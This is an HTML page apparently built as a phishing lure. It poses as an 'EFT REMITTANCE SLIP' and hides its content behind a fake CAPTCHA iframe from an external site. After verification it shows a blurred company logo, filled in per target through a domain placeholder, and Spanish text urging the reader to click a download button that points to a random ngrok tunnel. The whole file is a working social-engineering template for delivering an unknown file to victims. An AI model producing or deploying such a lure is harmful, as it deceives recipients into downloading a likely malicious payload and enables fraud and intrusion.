<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	
    <title>EFT REMITTANCE SLIP</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            font-family: Arial, sans-serif;
        }
        .background-container {
			display: none;
            position: relative;
            height: 100%;
            width: 100%;
            overflow: hidden;
        }
        .background-container::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            background-image: url('https://logo.clearbit.com/[[-Domain-]]'); /* Replace with your image URL */
            background-size: cover;
            background-position: center;
            filter: blur(8px);
            z-index: -1;
        }
        .overlay {
            position: relative;
            padding: 20px;
            color: white;
            text-align: center;
            background-color: rgba(0, 0, 0, 0.5); /* Optional: semi-transparent overlay */
        }
		.iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: none;
        }
    </style>
	<style>
        a:link, a:visited {
            background-color: #f44336;
            color: white;
            padding: 14px 25px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
        }

        a:hover, a:active {
            background-color: red;
        }
</style>
</head>
<body>
	<iframe id="captchaFrame" class="iframe" src="https://sordware.com/captcha.html" width="300" height="200"></iframe>

    <div class="background-container">
        <div class="overlay">
            <h1>PARA VER ESTE DOCUMENTO. HAGA CLIC EN EL BOTÓN DE ABAJO PARA DESCARGAR SU DOCUMENTO.</h1>
            
			<a href="https://a1n2j3m4n5b6vc7v8b8vc90vc8v9c75v3c5v6c34v5c676v34c6j65g43c.ngrok.app" download target="_blank">DESCARGAR DOCUMENTO</a>
        </div>
    </div>
</body>
<script>
	window.addEventListener("message", function(event) {
            if (event.data.verified) {
               setTimeout(()=>{
				 document.querySelector('.background-container').style.display = 'block';
				document.querySelector('.iframe').style.display = "none";
				},2000);
            }
        });
</script>

</html>
